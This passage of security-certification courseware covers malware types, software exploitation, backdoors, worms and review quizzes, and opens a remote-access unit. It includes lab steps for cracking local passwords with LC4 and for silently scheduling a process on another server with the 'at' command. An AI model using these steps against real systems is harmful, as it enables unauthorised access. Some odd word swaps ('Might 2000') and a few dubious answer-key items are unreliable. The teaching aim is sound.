                  important that organizations put in place a policy that dictates users choose strong
                  passwords that are not susceptible to this type of attack. Strong passwords are generally
                  at least eight characters and use a mixture of uppercase, lowercase, numeric, and special
                  characters.
                  It is unlikely that an attacker’s word list includes this type of password, although poorly
                  chosen passwords that meet the above criteria might still be in a hacker’s word list. The
                  word “p@55w0rd” (“password,” spelled using the well-known hacker style) would be a
                  bad choice for a password because it might be included in an attacker’s word list.
                                                                             Attacks and malicious code       3–35

Do it!                         G-1:   Decrypting encrypted passwords
                                Here’s how                         Here’s why
See the classroom setup         1 Download the LC4 software to     (Follow Instructor’s directions.) LC4 is the
instructions for location of      C:\Security                      premier password-cracking tool.
the download file.
                                                                   The download for LC4 is provided at
                                                                   net-security.org/software.php?id=17.

                                2 Install the program              (Follow the Instructor’s directions.)

                                3 Click Start and choose All       To open the LC4 Trial Version window.
                                  Programs, LC4, LC4

                                4 Click Trial                      To open the LC4 Wizard.

                                  Click Next                       To choose the program settings.

                                5 In the Get Encrypted Passwords
                                  window, verify that Retrieve
                                  from the local machine is
                                  selected

                                  Click Next

                                6 In the Choose Auditing Method    LC4 has the capability of doing a brute force
                                  window, select Strong            attack on passwords, which will find all
                                  Password Audit                   passwords given enough time. The trial version,
                                                                   however, does not do the brute force attack, so it
                                                                   finds only the most vulnerable passwords.

                                  Click Next

                                7 In the Pick Reporting Style
                                  window, select all options

                                  Click Next

                                  Click Finish                     To begin auditing. LC4 will successfully decode
                                                                   the simpler passwords on your system.

                                8 Close the LC4 program window
3–36     CompTIA Security+ Certification

Do it!              G-2:      Discussing attacks against encrypted data
                      Questions and answers
                       1 Weak keys are secret keys used in encryption that exhibit a poor level of
                         encryption. True or false?

                          True

                       2 The brute force approach to password guessing generates every possible
                         combination of keystrokes that could be included in a password. True or false?

                          True

                       3 What type of attack will use properties of the cryptographic algorithm to discover
                         its secret keys?
                          A      Birthday attack
                          B      Mathematical attack
                          C      Password guessing
                          D      All of the above

                       4 How does the dictionary attack succeed in cracking a password?

                          It resolves the hash for each word in its list of English words, and then compares the hash
                          against the user’s password hash. When the two match, the password is cracked.
                                                                                        Attacks and malicious code          3–37


Topic H: Software exploitation
                         This topic covers the following CompTIA Security+ exam objectives:

                          #     Objective

                          1.3   Identify non-essential services and protocols and know what actions to take to reduce the risks of
                                those services and protocols

                          1.4   Recognize the following attacks and specify the appropriate actions to take to mitigate
                                vulnerability and risk
                                 • Back Door
                                 • Software Exploitation

                          1.5   Recognize the following types of malicious code and specify the appropriate actions to take to
                                mitigate vulnerability and risk
                                 • Viruses
                                 • Trojan Horses
                                 • Logic Bombs
                                 • Worms

                          2.5   Recognize and understand the administration of the following file transfer protocols and concepts
                                 • Vulnerabilities
                                     • 8.3 Naming Conventions




                         Vulnerabilities in software
Explanation              The term exploit is often used to mean any type of attack on a computer system, but
                         software exploitation in the true sense means a penetration of security through
                         vulnerabilities in software. This term casts a wide net, but generally applies to all tools
                         and tricks that take advantage of vulnerabilities in software, whether logic errors or
                         buffer overflows.
Ask students how well-   The majority of successful attacks which use software exploits take advantage of well-
known vulnerabilities    known vulnerabilities, such as ones that are publicly known, and ones for which patches
remain a problem if a
fix is developed.        and fixes are readily available from their vendors, usually by download over the
                         Internet.
                         An excellent example of this is the wave of worms that exploited Microsoft’s IIS Server
                         in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to
                         successfully use, vulnerabilities that have received national press and for which fixes
                         have been available for some time now. These worms have severely impacted the
                         Internet by congesting links with attack traffic and crashing Internet routers, and the
                         worms have severely impacted the businesses that have been hit by them. This points to
                         a continued pattern of indifference to security issues on the part of system
                         administrators, according to a study by Gartner Research in Might of 2002.
3–38   CompTIA Security+ Certification

                  As software is tested by industry experts to assess its level of security and
                  vulnerabilities are identified, the vendor is notified and given time to address the issue
                  before the public is made aware. In this way, users of the product are given an
                  opportunity to protect their systems with vendor-provided fixes and patches before
                  attack tools are generated that can be operated by those with script kiddie-level skills.

                  Buffer overflows
                  Buffer overflows is a very common type of vulnerability and are frequently exploited on
                  the Internet to gain access to systems. This type of attack works in the following
                  manner.
                  Whenever software accepts any type of data from a user or another application, it
                  allocates memory for that data. If the data that is passed to the software is too large to fit
                  into the allocated memory (the buffer), the data could overwrite areas of memory
                  reserved for other processes, including the stack. What results is a buffer overflow,
                  which can have a variety of consequences including application crashes, operating
                  system crashes, or no effect at all—or it could result in a situation in which the attacker
                  can cause his own code to be executed on the system. In this case, the attacker’s buffer
                  overflow could give the attacker access to the system.

                  Countermeasures
                  The key to stopping software exploits against your critical systems is to stay apprised of
                  the latest security patches provided by your software vendors. Most vendors provide
                  mailing lists for this purpose, so customers can be immediately aware of security issues
                  associated with their products, as well as the fixes for those problems. Most security
                  patches are readily available free of charge.
                  Microsoft provides a number of free tools and services to Windows users in order for
                  users of their products to stay abreast of the frequent security updates for their product.
                  Perhaps the most accessible method, found at windowsupdate.microsoft.com, is
                  an automated tool that can examine a Windows machine and identify the latest security
                  and product updates needed for that particular machine. Other tools include the
                  Microsoft Baseline Security Analyzer (MBSA) that identifies critical patches that have
                  not been installed on Windows servers.
                  For more information, go to www.microsoft.com/security.

                  Malicious software
                  Malicious software, or malware, is a catchall term for programs such as viruses, worms,
                  Trojan horses, and backdoor programs that either have negative behaviors or are used
                  by attackers to further their goals. The primary difference between the various types of
                  malware is their means of spreading. The following table outlines the primary
                  differences between worms, viruses, and Trojan horses; more precise explanations are
                  given in each of the following sections:
                                                          Attacks and malicious code   3–39

 Type           Propagation                                       Examples

 Virus          Copies itself into other executable programs      Melissa
                and scripts.

 Worm           Exploits vulnerabilities with the intent of       Code Red
                propagating itself.

 Trojan horse   Uses social engineering techniques to trick       ILOVEYOU, Naked
                users into running the malware’s executable.      Wife, Anna Kournikova



Viruses
Viruses are self-replicating programs that spread by “infecting” other programs. Viruses
copy themselves into other programs and change them (or their environments) so that,
when the infected program is run, the virus is also executed and has the opportunity to
spread the infection to other programs.
The host program or executable can be any binary file, script, or code that has the
opportunity to modify other programs. A virus can infect an executable binary, a Visual
Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet
Relay Chat) clients such as Pirch or mIRC.
It’s important to remember that programs do not have to actually modify an executable
itself to be categorized as viruses. Self-replicating programs that modify the behavior of
the host program or its environment are also clearly viruses. For example, a virus might
cause an e-mail client to mail a copy of the virus to every user in the client’s address
book without actually modifying the e-mail client’s code.

Types of viruses
The number, variety, and frequency of new viruses are astounding. A visit to one of the
many online virus databases reveals new viruses being discovered on a daily basis. The
following table provides just a sampling of virus databases:

 Product                         URL

 Network Associates (McAfee)     http://vil.nai.com/VIL/default.asp

 Symantec                        http://securityresponse.symantec.com/avcenter/vinfodb.html

 Computer Associates             www3.ca.com/virus/encyclopedia.asp

 Trend Micro                     www.antivirus.com/vinfo/virusencyclo/
3–40   CompTIA Security+ Certification

                  The viruses can be categorized according to type. The following table lists the
                  predominant virus types:

                   Type                  Description

                   Boot sector           Spread by infecting floppy or hard disk boot sectors; when an infected
                                         disk is booted, the virus is loaded into memory and attempts to infect the
                                         hard disk and all floppy disks inserted into the computer.

                   File infector         A class called “parasitic viruses” because they must infect other programs;
                                         file infectors copy themselves into other programs. When an infected file
                                         is executed, the virus is loaded into memory and tries to infect other
                                         executables. File types commonly infected include:
                                         *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com.

                   Multipartite          Propagated by using both boot sector and file infector methods.

                   Macro viruses         Currently accounting for the vast majority of viruses, macro viruses are
                                         application specific as opposed to OS specific and propagate very rapidly
                                         via e-mail. Many macro viruses are Visual Basic scripts that exploit
                                         commonly used Microsoft applications such as Word, Excel, and Outlook.

                   Companion             Instead of modifying an existing program, the companion virus uses the
                                         DOS 8.3 naming system to disguise itself as a program with the same
                                         name but different extension. For example, a virus might name itself
                                         solitaire.com to emulate the solitaire.exe program. The .com file executes
                                         before an .exe file of the same name. The virus then runs the real program
                                         so it appears as if everything is normal.

                   Polymorphic           Changes or mutates as it copies itself to other files or programs. The goal
                                         is to make it difficult to detect and remove the virus.

                   Metamorphic           Similar to polymorphic, but recompiles itself into a new form, so the code
                                         keeps changing from generation to generation.



                  Propagation techniques
                  Antivirus software and online scanning services have become more commonplace, so
                  viruses must spread quickly if they are to spread at all. To accomplish this, viruses
                  combine mass mailing techniques (sending copies of itself to all recipients in the
                  infected hosts’ address book) with file infectors and worm techniques. Mass mailing
                  techniques allow each instance of the virus to infect potentially hundreds of hosts.
                  The following table outlines some of the methods that virus writers are using to spread
                  their viruses:
                                                         Attacks and malicious code        3–41

 Item             Info                  Description

 SKA              January 1999          Single mailer.

 Melissa          March 1999            Mass mailer targeting 50 recipients in a single
                                        activation.

 Babylonia        December 1999         Mass mailer using plug-in techniques.

 LoveLetter       Might 2000            Mass mailer targeting all recipients in the victim’s
                                        address book, in multiple activations.

 MTX              August 2000           Mass mailer incorporating file infector, sharing
                                        network, and backdoor features.

 Nimda            September 2001        Mass mailer, also incorporating file infector, sharing
                                        network, backdoor process, and IIS infector methods.

 Sobig            January 2003          Spread through built-in SMTP client and local
                                        Windows network shares

 Jitux.A          December 2003         Spread through MSN Messenger


The major trend in viruses is that virus writers are adapting to more fully exploit the
Internet’s functionality. Boot sector viruses, previously the most prevalent virus type,
have been supplanted by worms and macro viruses that take advantage of the
increasingly interconnected computing environments. Instead of slowly infecting
machines as floppy disks are swapped and shared, viruses can now spread virulently
enough to have a global impact in a matter of days or weeks via the Internet.

Costs
Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to
erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have
these qualities have extremely negative consequences. This is because viruses typically have
consequences unintended by the virus writer. For obvious reasons, virus writers do not
perform compatibility testing. When the virus spreads into systems with differing software
packages or OS flavors, it can have unforeseen impacts which can range from slow system
response times to causing the infected system to crash.
When a virus becomes widespread, it causes very large productivity losses in businesses
around the world as computer users struggle with their infected machines. Widespread
infections can also result in what is effectively a denial-of-service (DoS) attack on mail
servers, which can be brought to a grinding halt as they are swamped with a huge volume of
virus-generated messages.
Additional costs are incurred as system administrators have to spend time battling the
infection and removing it from computers. Virus removal can often be a difficult and
time-consuming process. The cleanup process itself can inadvertently cause additional
damage to the computer system because administrators often have to replace important
system files that are infected by the virus. Businesses can incur a significant cost in
terms of goodwill and reputation if they are infected with a virus.
3–42        CompTIA Security+ Certification

                           Countermeasures
                           A number of vendors provide enterprise virus protection solutions that can effectively
                           filter known viruses, Trojan horses, and worms. These solutions include desktop
                           antivirus programs, virus filters for e-mail servers, and network appliances that detect
                           and remove viruses. Best practices dictate that large organizations need a multi-layered
                           security approach that defends against malware from all points of entry to the network.
                           This means that no single solution is enough: virus solutions at network gateways,
                           desktops, and on e-mail servers (both internally and on network Demilitarized Zones)
                           are needed to best protect the enterprise’s productivity and information assets.

                            Item                   Description
Stress the importance of    Antivirus products     Install products from multiple vendors. Some suppliers offer a fix for a
virus database update                              given new virus before others, so by using multiple products, your
subscriptions so new                               organization can have the fix for new viruses sooner.
software does not have
to be purchased when
an outbreak occurs.                                Keep virus signature databases up to date on both desktop computers
                                                   and servers. Use automated systems to automatically download and
                                                   install the latest signatures.

                            Policies and           Define an organizational policy that clearly states proper use of e-mail
                            procedures             and network resources, and ensures that computer users receive
                                                   training on safe computing habits.

                            Software updates and   Keep machines, and especially servers, up to date with security patches
                            patches                to ensure their systems are not vulnerable to well-known exploits.

                            User education         Instruct users to never download any file from an unknown source. If a
                                                   program is double-clicked even once, even for a moment to “check it
                                                   out,” the computer can be infected.

                                                   Caution users about executable files sent to them even from friends
                                                   and co-workers. In general, there is little need to send executables
                                                   via e-mail. Users should always check with the source before
                                                   running the executable.

                            Configure servers      Many e-mail servers can automatically disable forwarding of
                                                   dangerous file types by e-mail to prevent the spread of viruses and
                                                   other malware.



                           Trojan horses
                           According to legend, the ancient Greeks tricked the Trojans into admitting the Greek
                           army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled
                           the horse behind the city’s fortifications, the Greek soldiers who were stowed away
                           inside were able to gain access and conquer the city of Troy.
                           Likewise, the makers of Trojan horse programs gain access to their victim’s computers
                           by tricking them into running their malware by presenting the program as something
                           useful or beneficial. The candy used to induce users to run the Trojan horse can include
                           anything someone might find interesting: games, pictures, MP3s, screen savers, or
                           pornography (one famous Trojan was entitled “Naked Wife”). When the unwitting user
                           runs the program, it can wreak havoc with any number of methods including:
                                                                    Attacks and malicious code       3–43

             • Sending copies of itself to all recipients in the users address book
             • Deleting or modifying files
             • Installing backdoor/remote control programs
         Most Trojan horses install themselves silently; users often don’t realize they’ve been
         infected until they receive an e-mail from someone saying an e-mail they have received
         from the user was infected with a Trojan. In the meantime, the attacker might have
         already collected password files or uploaded additional tools to use the victims’
         computers for DDoS attacks.

         Propagation techniques
         Many viruses are categorized as Trojan horses because they use some sort of social
         engineering to induce the victim into running the attacker’s program. Most modern e-
         mail clients do not allow programs contained in e-mail messages to execute
         automatically, viruses that spread by e-mail cannot multiply without user intervention.
         One feature of the Windows operating system that can be used to trick users into
         running Trojan horses is the “Hide file extensions of known file types” option. By
         default, Microsoft Windows hides file extensions, which can cause files to appear to be
         a different file type than they actually are. If file name extensions are hidden, then the
         file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing
         Trojan horses.

         Countermeasures
         Implement a clear organizational policy regarding e-mail attachments and train users
         regarding the policy.
         Install antivirus programs on each client and maintain current signature files.

Do it!   H-1:     Discussing viruses and Trojan horses
          Questions and answers
           1 Describe a macro virus.

              These Visual Basic scripts exploit Microsoft applications.

           2 What is a polymorphic virus?
              A    A virus that recompiles itself into a new form from generation to generation.
              B    A virus that changes itself as it copies to other files or programs.
              C    A virus that spreads by infecting the hard boot sector or floppy disks.
              D    A virus that presents itself as a useful or beneficial program in order to trick
                   the user into executing it.

           3 Describe how a Trojan horse is propagated.

              It usually is attached to an e-mail message. Once run, it can use the user’s address book to
              send copies of itself to other marks.
3–44      CompTIA Security+ Certification

                     Backdoor
Explanation          A backdoor is a piece of malicious software, or malware, that allows a malevolent user
                     to gain remote access without the knowledge or permission of its owner. Also known as
                     remote access Trojans, these programs allow an attacker to connect to the compromised
                     computer locally or over the Internet and, depending on the type of backdoor installed,
                     issue a wide variety of commands. Although some machines compromised with
                     backdoor programs are used to store files and applications such as hacks and exploits for
                     later use, they can also be used as handlers in a distributed denial-of-service attack.

                     Trojan.VirtualRoot
                     Backdoor programs can be installed on victim machines by any number of methods:
                     Trojans or other social engineering methods, worms, viruses, or manually by exploiting
                     vulnerabilities and uploading the remote control software. One recent threat using a
                     backdoor is the Code Red II worm, which exploits vulnerability in Microsoft IIS servers
                     to gain entry, install remote access software called Trojan.VirtualRoot, and continue to
                     spread to other machines. This type of attack is typical of the recent trend of blended
                     threats. Once the Trojan.VirtualRoot backdoor has been installed, the server might be
                     controlled remotely.

                     Back Orifice 2000
                     One of the more famous remote access control/backdoor programs is Back Orifice 2000
                     (BO2K), mockingly named after Microsoft’s Back Office 2000 product suite. Produced
                     by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is
                     offered as a remote administration tool, although its lightweight and unobtrusive nature
                     allow it to be surreptitiously installed on a victim’s computer without his or her
                     knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8,
                     and installed on the compromised system, it immediately buries itself into the Windows
                     system directory and runs itself silently every time the computer is rebooted.




                     Exhibit 3-8: BO 2K configuration screen
                                                           Attacks and malicious code    3–45

    A remote attacker can then connect to the compromised machine by using the BO2K
    client GUI and issue any number of commands. Plug-ins are available for BO2K that
    allow the hacker to view the compromised computer’s desktop and move the mouse
    pointer. It is even possible for the remote attacker to activate the victim’s video camera
    and microphone, thereby monitoring everything, and everyone, in front of the computer.
    BO2K runs on most Windows systems and is currently being used on other operating
    systems. For more information about the tool, see the following Web site:
        http://sourceforge.net/projects/bo2k/

    NetBus
    NetBus is an earlier remote control/backdoor tool that has similar functionality to that of
    BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or
    worm that gives hackers the ability to connect to the compromised machine over the
    Internet and issue a variety of commands. Some of the commands seem to be included
    in the feature set more for their ability to impress the unassuming victim than to be
    useful. A list of NetBus commands is shown in Exhibit 3-9.




    Exhibit 3-9: NetBus commands


    Countermeasures

.
    Backdoor and remote access programs such as BO2K and NetBus are easily detected
    and eliminated by antivirus software and are otherwise thwarted by using the same
    mechanisms as used against Trojan horses and viruses. For this reason, it is important to
    implement an effective virus screening solution on all servers and desktop computers, as
    well as to educate computer users about the danger of e-mailed viruses and Trojan
    horses. In addition to these regimens, critical e-commerce servers should be equipped
    with host-based intrusion detection systems to block attacks that result in the installation
    of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection
    systems, although some backdoors encrypt their traffic to bypass network IDS signature
    detection.
3–46          CompTIA Security+ Certification

Do it!                         H-2:   Using the AT command to start system processes
                                Here’s how                       Here’s why
For this activity, students     1 On Server-X, log in as         The Windows operating system allows you to
will work in pairs. Each          Administrator                  execute a program on a remote system. Using
partnership will use two                                         the “at” command, you can schedule an
machines, Server-X and                                           executable to run on a remote system at a
Server-Y. Instruct
students to substitute their
                                                                 specific time. This is a remote access Trojan and
server’s hostname for                                            is commonly used to install Trojan horses on a
Server-X and their                                               remote system.
partner’s server hostname
for Server-Y.                   2 Press c + a + d

                                  Click Task Manager             To open the Windows Task Manager.

                                  Activate the Processes tab     To view the current processes. Look for
                                                                 notepad.exe. You should not see it.

                                3 On Server-Y, log in as
                                  Administrator

                                4 Open a command prompt window

                                5 Enter the following command:

                                  net time \\server-x

                                                                 To know the current time for Server-X so you
                                                                 can schedule the execution of a program.

The value for <time>            6 Enter the following command:   Where <time> is 3 minutes after the current
should be 3 minutes after                                        time.
the current time for
Server-X.
                                  at \\server-x <time> /interactive "notepad.exe"

                                                                 The command at \\server-x 3:49p ►
                                                                 /interactive “notepad.exe”, for
                                                                 example, will launch notepad within an
                                                                 interactive window at 3:49 PM on Server-X.

                                7 Enter the following command:

                                  at \\server-x <time> "notepad.exe"

                                                                 The command at \\server-x 3:49p ►
                                                                 “notepad.exe”, for example, will launch
                                                                 notepad in a background process at 3:49 PM on
                                                                 Server-X.

                                                                 Omitting the “/interactive” switch launches a
                                                                 process that is hidden from your partner.
                                                Attacks and malicious code      3–47

 8 At Server-X , after the time
   specified in the command lapses,
   check Windows Task Manager
   and view the processes




 9 Check the Server-X desktop for     You'll see Notepad is running on the server.
   the Notepad application

10 Close Task Manager and Notepad
   on Server-X and the command
   window on Server-Y
3–48      CompTIA Security+ Certification

                     Logic bombs
Explanation          Another category of malicious code is known as a logic bomb. A logic bomb is a set of
                     computer instructions that lie dormant until triggered by a specific event. That event can
                     be almost anything, such as opening a document, launching a program, pressing a key a
                     certain number of times, or an action that the computer has taken. Once the logic bomb
                     is triggered, it performs a malicious task.
                     Logic bombs might reside within stand-alone programs as Trojan horses or they might
                     be part of a computer virus. This makes them almost impossible to detect until after they
                     are triggered and the damage is done.
                     Logic bombs are often the work of former employees. One logic bomb caused a
                     company’s computerized accounting system to be corrupted. It was triggered by an
                     instruction to check the corporate salary database every three months; if the
                     programmer’s name was not found, the logic bomb was instructed to launch.
                     Another logic bomb was the work of an independent computer consultant hired to write
                     a program. His intention was to return after the logic bomb was triggered and be paid a
                     large consulting fee to fix the problem.
                     On personal computers, a prominent type of logic bomb is known as a macro virus. A
                     macro virus uses the auto-execution feature of the specific application programs, such
                     as Microsoft Word. Whenever Word is launched, the virus is triggered and performs a
                     malicious act.

                     Worms
                     Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious
                     activity on the Internet. The release of the Code Red worm in the summer of 2001,
                     which was shortly followed by Code Red II and Nimda, brought about a sea of change
                     in the type of attacks that security administrators need to fend off.
                     Although the term worm has a few different commonly used meanings, the “classic
                     worm” or “real worm” is defined as a self-contained program that uses security flaws
                     such as buffer overflows to remotely compromise a victim and replicates itself to that
                     system. Unlike viruses, true worms do not infect other executable programs, but instead
                     install themselves on the victim computer system as a stand-alone entity that does not
                     require the execution of an infected application.

                     Melissa
                     The term e-mail worm has also been informally used to mean a virus that spreads
                     through external network connections, emphasizing the threat posed by mass mailing
                     viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail
                     worm and most famous virus to date. Melissa gained notoriety in March of 1999 as the
                     first virus to send mass e-mails of itself by using recipients in a user’s address book.

                     Code Red
                     Although e-mail worms have become a common and very prevalent threat to networks,
                     true worms such as Code Red have become even more common, accounting for 80% of
                     all malicious activity on the Internet and bringing e-commerce networks to a standstill.
                     Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS
                     4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then
                     scanned for the IIS vulnerability. If the worm found a target system with the
                     vulnerability, it executed the buffer overflow exploit, which resulted in the worm’s code
                     being loaded onto and executed by the victim system.
                                                     Attacks and malicious code   3–49

The worm then began to propagate itself from the newly compromised machine. After
two hours, the worm changed the server’s Web page.
The Code Red worm also tried to perform a denial-of-service attack on the IP
address of www.whitehouse.gov, but the threat was averted by simply changing
the domain’s IP address.
Since Code Red did not store itself on any files, the worm could be removed from
infected systems simply by rebooting the machine; however, servers would remain
vulnerable to the attack and could be reinfected with Code Red until system
administrators applied the necessary security patch provided by Microsoft.
Although Code Red was programmed to go dormant shortly after its release, its
successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS
servers over a year after their release.

Countermeasures
The method of true worms is to exploit known vulnerabilities in order to spread
themselves; the key defense against these attacks is for system administrators to ensure
all servers are patched with the latest security updates. Since Nimda can exploit a
vulnerability in Internet Explorer to run an executable in a Web page or e-mail message
without user intervention, system administrators must keep abreast of security issues
affecting their users’ desktop computers and ensure the required security patches are
installed.
Network and host based intrusion detection systems (IDS) are also critical components
needed to secure a network against remote attacks such as Code Red. Host-based IDS
can detect unauthorized system activity and stop it before the server is infected.
Network-based IDS can detect the signatures of known worms as well as the malicious
activity generated by those worms and can notify system administrators as well as
instruct routers and firewalls to block traffic from the offending hosts.
To protect against worm attacks that are propagated via e-mail, a comprehensive
antivirus system should be implemented. Make sure users have their e-mail set so it
does not preview a message when selected. Instead, users should have to double-click
the message and only then if they recognize the sender.
3–50     CompTIA Security+ Certification

Do it!              H-3:      Understanding software exploitation
                      Questions and answers
                       1 What is a buffer overflow?

                          A buffer overflow is an attack where the software fills the allocated memory and starts
                          overwriting areas of memory reserved for other processes. It results in application crashes,
                          operating system crashes, or a situation where the attacker can cause his own code to be
                          executed on the system.

                       2 What is the difference between a virus and a worm?

                          A virus is a self-replicating program that spreads by infecting other programs. A worm is a
                          self-contained program that uses security flaws to compromise the victim and replicate itself
                          to that system.

                       3 The Windows Server 2003 at command is a backdoor. True or false?

                          True: If used to install malicious code on a target system.
                                                                Attacks and malicious code    3–51


Unit summary: Attacks and malicious code
Topic A   In this topic, you learned that Denial-of-service (DoS) attacks are a family of attack
          methods that interrupt network services for legitimate users. You learned that an SYN
          flood prevents users from accessing a target server by flooding it with half-open TCP
          connections, and that the Smurf attack overwhelms a host with ICMP packets. You also
          learned about the Ping of Death, which uses IP packet fragmentation techniques to
          crash remote systems, as well as Distributed Denial of Service attacks, which
          manipulate multiple hosts to carry out a DoS attack on a target.
Topic B   In this topic, you learned that man-in-the-middle attacks refer to a class of attacks in
          which the attacker places himself between two communicating hosts and listens in on
          their session. The key to this concept is that both hosts think they are communicating
          with the other when they are in fact communicating with the attacker.
Topic C   In this topic, you learned that spoofing is pretending to be someone else by imitating or
          impersonating that person in order to gain access to a network. There are four primary
          types of spoofing that are issues for the information security professional: IP address
          spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
Topic D   In this topic, you learned about replay attacks, where attackers listen to and repeat
          messages from a legitimate user in order to impersonate the user and gain access to
          systems.
Topic E   In this topic, you learned about TCP session hijacking, where an attacker tries to make
          the victim believe that he or she connected to a trusted host, when in fact the victim is
          communicating with the attacker.
Topic F   In this topic, you learned about social engineering attacks and why they can be so
          effective in obtaining a password or other valuable information from unsuspecting
          victims.
Topic G   In this topic, you learned that malicious software, or malware, is a catchall term for
          programs such as viruses, worms, Trojan horses, and backdoor programs that either
          have negative behaviors or are used by attackers to further their goals.
Topic H   In this topic, you learned about software exploitation. You learned that the primary
          difference between the various types of malware is their means of spreading.

          Review questions
           1 Distributed denial-of-service attacks can involve which of the following? (Choose
             all that apply.)
              A   Zombies
              B Birthday attack
              C   Handlers
              D TFN2K
3–52   CompTIA Security+ Certification

                    2 Which of the following correctly outlines the normal setup of a TCP session?
                      A ACK, SYN, SYN/ACK
                      B SYN, ACK, RST
                      C    SYN, SYN/ACK, ACK

                      D ACK, RST, SYN/ACK
                    3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:

                          Item            Type

                          CodeRedII         Virus

                          Trin00            Tool

                          BO2K              Backdoor

                          Stacheldracht     Tool

                          Melissa           Virus


                    4 ARP poisoning affects which of the following? (Choose all that apply.)
                      A Hostname-to-IP address resolutions
                      B    IP address-to-MAC address resolutions
                      C Domain name resolution
                      D Authentication requests
                    5 Man-in-the-middle attacks can be accomplished using which of the following?
                      A    ICMP redirects
                      B NetBus
                      C ARP spoofing
                      D Replay attacks
                    6 Denial-of-service (DoS) attacks is a family of attack methods that make target
                      systems unavailable to their legitimate users. True or false?
                      True

                    7 The SYN flood attack exploits the nature of the TCP three-way ______________.
                      Handshake

                    8 What are IP fragmentation attacks and how do they work?
                      These attacks misuse ICMP. These attacks craft a very large IP packet and send it to the victim
                      fragment by fragment. Once the collected fragments exceed the 65,535 byte size limit, the
                      victim’s host crashes.

                    9 Pings are used to establish whether a remote host is reachable. True or false?
                      True
                                                            Attacks and malicious code   3–53

10 A well-known exploit that uses IP Packet fragmentation techniques to crash remote
   systems is called:
    A Spoofing
    B Smurf
    C   Ping of Death

    D ARP poisoning
11 Smurf is a non-OS specific attack that uses the network to amplify its effect on the
   victim. True or false?
    True

12 The best defense against a replay attack is:
    An anti-replay feature that makes each packet unique.

13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all
   internal routers. True or false?
    True

14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or
   false?
    True

15 What are three strategies for cryptanalysis?
    Cyphertext-only, known plaintext attack, chosen plaintext attack

16 The _____________ attack is used to find collisions of hash functions.
    Birthday

17 A _________________ __________________ is a program that poses as something
   else, causing the user to ‘willingly’ inflict the attack on himself or herself.
    Trojan horse
                                                           4–1


Unit 4
Remote access
                Unit time: 120 minutes

                Complete this unit, and you’ll know how to:

                A Explain the different communications
                   mediums for remote access and issues
                   surrounding them.

                B Describe the IEEE 802.1X, RADIUS, and
                   TACACS+ authentication systems.

                C Describe VPN technology and its tunneling
                   protocols.

                D Identify the different vulnerabilities
                   associated with telecommuting.
4–2       CompTIA Security+ Certification


Topic A: Securing remote communications
Explanation          Networks have become ubiquitous in today’s interconnected world. Access to these
                     networks from remote locations has also boomed. As the trend towards telecommuting
                     grows, so has the risk associated with increased exposure. Open-air networks, equipped
                     with mobile phones, PDAs, and wireless NICs, are vulnerable to snooping and denial of
                     service attacks. Personal firewalls and antivirus scanners provide limited protection as
                     telecommuter’s access e-mail and Internet messaging services over open cable and
                     public telephone lines. Hackers’ tools and how-to manuals abound on the Internet,
                     within easy reach of “script kiddies.”
                     The task of the security specialist is to identify all communications mediums whereby
                     remote users can communicate with their home office, identify their potential
                     vulnerabilities, and then take precautionary measures to safeguard the confidentiality,
                     integrity, and accessibility of data.

                     Communications mediums
                     The communication medium describes the physical connection between the remote
                     computer and your network. These include:
                        • Dial-up connections
                         • Integrated Services Digital Networks (ISDN)
                         • Digital Subscriber Lines (DSL)
                         • Cable modems

                     Dial-up connections
                     Public Switched Telephone Network (PSTN) connections (also called dial-up
                     connections) use analog modems and standard telephone lines to transmit data. They
                     rely on Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) to dial
                     up and connect to a remote access server. (PPP is a data link protocol that provides dial-
                     up access over serial lines. It provides password protection and authentication using the
                     PAP or the stronger CHAP protocols. SLIP is an older data link protocol and has been
                     largely replaced by PPP.)
                     PSTN connections are the cheapest means of data communications, although lack of a
                     local ISP can run up some expensive long-distance bills. Speeds range up to 56 Kbps.
                     From a security standpoint, telephone lines are difficult to sniff, but are susceptible to
                     war dialing. This is an attack where the perpetrator dials all telephone numbers within a
                     specific neighborhood, records those that have modem connections then redials into the
                     system in an attempt to break into the computer.

                     ISDN
                     Integrated Services Digital Network (ISDN) is a telecommunications standard for
                     transmitting voice, video, and data over digital lines. Like PSTN, it relies on SLIP and
                     PPP to communicate.
                     ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B
                     channels, or “bearer” channels, which can be combined to create higher bandwidth, to
                     carry voice and data. It provides a separate 16 Kbps D channel, or “delta,” channel for
                     control signals.
                                                                  Remote access      4–3

The D channel is used to signal the telephone company computer to make calls, put
them on hold, and activate features such as conference calling and call forwarding. It
also receives information about incoming calls, such as the identity of the caller.
ISDN also offers two high-end services:
    • Primary Rate Interface (PRI) is geared for business customers. The North
      American and Japanese implementation provides 23 64-Kbps B channels and
      one 64 Kbps D channel for control signals. The European implementation
      provides 30 B channels and one D channel.
    • Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell
      switching with rates above 155 Mbps to transport data, voice, and video on a
      single circuit.
ISDN is noticeably faster than analog modems but significantly slower than DSL
connections. Unlike DSL, it can be installed in almost any location.

DSL
Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper
telephone lines for high-speed Internet access. DSL technology is available in several
forms, collectively referred to as xDSL. Transmission speeds range between 384 Kbps
for Internet uploads and 1.54 Mbps for downloads.
DSL must be installed within a 5.5 km (18,000 ft.) radius of the phone company’s
access point. The faster the connection, the closer the subscriber must be to the access
point. DSL is more expensive than analog connectivity options.
One security issue concerning DSL is that the network connection is always on until the
